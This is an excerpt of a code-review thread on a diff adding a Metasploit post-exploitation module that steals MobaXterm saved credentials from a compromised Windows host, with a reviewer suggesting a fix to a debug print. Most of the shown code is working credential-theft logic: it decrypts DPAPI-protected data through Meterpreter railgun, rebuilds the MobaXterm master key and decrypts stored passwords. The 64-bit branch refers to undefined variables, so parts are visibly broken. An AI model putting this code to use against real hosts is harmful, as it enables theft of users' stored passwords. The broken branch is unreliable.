modules/post/windows/gather/credentials/moba_xterm.rb

```diff
@@ -0,0 +1,330 @@
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_railgun_api
+              stdapi_railgun_api_multi
+              stdapi_railgun_memread
+              stdapi_railgun_memwrite
+              stdapi_sys_process_get_processes
+            ]
+          }
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('MASTER_PASSWORD', [ false, 'If you know the password, you can skip decrypting the master password. If not, it will be decrypted automatically']),
+        OptString.new('CONFIG_PATH', [ false, 'Specifies the config file path for MobaXterm']),
+      ]
+    )
+  end
+
+  def windows_unprotect(entropy, data)
+    rg = session.railgun
+    pid = session.sys.process.getpid
+    process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
+    mem = process.memory.allocate(data.length)
+    addr_entropy = session.railgun.util.alloc_and_write_string(entropy)
+    process.memory.write(mem, data)
+    if session.sys.process.each_process.find { |i| i['pid'] == pid } ['arch'] == 'x86'
+      addr = [mem].pack('V')
+      len = [data.length].pack('V')
+      elen = [entropy.length].pack('V')
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{[addr_entropy].pack('V')}", nil, nil, 0, 8)
+      len, addr = ret['pDataOut'].unpack('V2')
+    else
+      addr = Rex::Text.pack_int64le(mem)
+      len = Rex::Text.pack_int64le(data.length)
+      eaddr = Rex::Text.pack_int64le(mem2)
+      elen = Rex::Text.pack_int64le(ent.length)
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{eaddr}", nil, nil, 0, 16)
+      p_data = ret['pDataOut'].unpack('VVVV')
+      len = p_data[0] + (p_data[1] << 32)
+      addr = p_data[2] + (p_data[3] << 32)
+    end
+
+    return '' if len == 0
+
+    process.memory.read(addr, len)
+  end
+
+  def key_crafter(config)
+    if (!config['SessionP'].empty? && !config['SessionP'].nil?)
+      s1 = config['SessionP']
+      s1 += s1 while s1.length < 20
+      key_space = [s1.upcase, s1.upcase, s1.downcase, s1.downcase]
+      key = '0d5e9n1348/U2+67'.bytes
+      for i in (0..key.length - 1)
+        b = key_space[(i + 1) % key_space.length].bytes[i]
+        if !key.include?(b) && '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/'.include?(b)
+          key[i] = b
+        end
+      end
+      return key
+    end
+  end
+
+  def mobaxterm_decrypt(ciphertext, key)
+    ct = ''.bytes
+    ciphertext.each_byte do |c|
+      ct << c if key.include?(c)
+    end
+    if ct.length.even?
+      pt = ''.bytes
+      (0..ct.length - 1).step(2) do |i|
+        l = key.index(ct[i])
+        key = key[0..-2].insert(0, key[-1])
+        h = key.index(ct[i + 1])
+        key = key[0..-2].insert(0, key[-1])
+        next if (l == -1 || h == -1)
+
+        pt << (16 * h + l)
+      end
+      p pt.pack('c*')
```

Comment:
```suggestion
      pp pt.pack('c*')
```
This suggestion eliminates the syntax error. Though maybe this could be changed to use `print_status` with some context around what is being printed?